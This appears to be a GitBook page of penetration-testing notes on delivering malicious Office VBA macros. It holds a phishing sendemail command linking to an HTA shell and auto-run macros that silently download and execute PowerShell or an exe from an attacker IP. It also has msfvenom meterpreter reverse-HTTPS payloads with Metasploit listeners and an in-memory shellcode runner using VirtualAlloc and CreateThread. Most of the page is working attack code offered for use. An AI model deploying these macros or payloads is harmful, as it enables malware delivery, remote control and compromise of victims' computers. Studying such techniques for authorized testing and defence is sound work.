All Gitbook

Client Side Code Execution

VBA Macro in MS Office

Send email

sendemail -f [email protected] -t [email protected] -s victim.ip -u "Subject" -m "Help: http://hacker.ip/shell.hta"

Run from Web Server through Powershell In-Memory

kali host web server:
python -m http.server 80
scope = document
macro vba; scope = doc1
Sub MyMacro()
    Dim str As String
    str = "powershell -ep bypass -nop -c iex ((New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/rev.ps1'))"
    Shell str, vbHide
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub
Powershell Inside VBA

In-Memory Shellcode VBA Macro without .exe

/x64/ shellcode with Dim res As LongPtr for x64 modern MS Office

Workbook_Open() for Excel

VBA Shellcode:
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 EXITFUNC=thread -f vbapplication
listener:
sudo msfconsole -q -x "use exploit/multi/handler"
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
run
macro vba; scope = doc1
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr

Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr

Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr

Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long

Function MyMacro()
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As Long
    
    buf = Array(232, 130, 0, 0, 0, 96, 137…)

    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
    
    For counter = LBound(buf) To UBound(buf)
        data = buf(counter)
        res = RtlMoveMemory(addr + counter, data, 1)
    Next counter
    
    res = CreateThread(0, 0, addr, 0, 0, 0)
End Function 

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

The shell dies when closing the doc; resolve by AutoMigrate module in MSF

LogoMetasploit for Pentester: MigrateHacking Articles
VBA AV Bypass

VBA .exe Shellcode Download & Execute on Disk

shell.exe to serve in kali:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f exe -o msfstaged.exe
listener:
sudo msfconsole -q -x "use exploit/multi/handler"
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
run
kali host web server:
python -m http.server 80
macro vba; scope = doc1
Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/msfstaged.exe', 'msfstaged.exe')"
    Shell str, vbHide
    Dim exePath As String
    exePath = ActiveDocument.Path + "\msfstaged.exe"
    Wait (2)
    Shell exePath, vbHide

End Sub

Sub Wait(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub
IWR alternative MyMacro
Sub MyMacro()
    Dim str As String
    str = "powershell -c "IWR -Uri http://192.168.119.120/msfstaged.exe -OutFile C:\temp\msfstaged.exe"
    Shell str, vbHide
    Dim exePath As String
    exePath = "C:\temp\msfstaged.exe"
    Wait (2)
    Shell exePath, vbHide

End Sub
PreviousUsefulNextPowershell rev.ps1

Last updated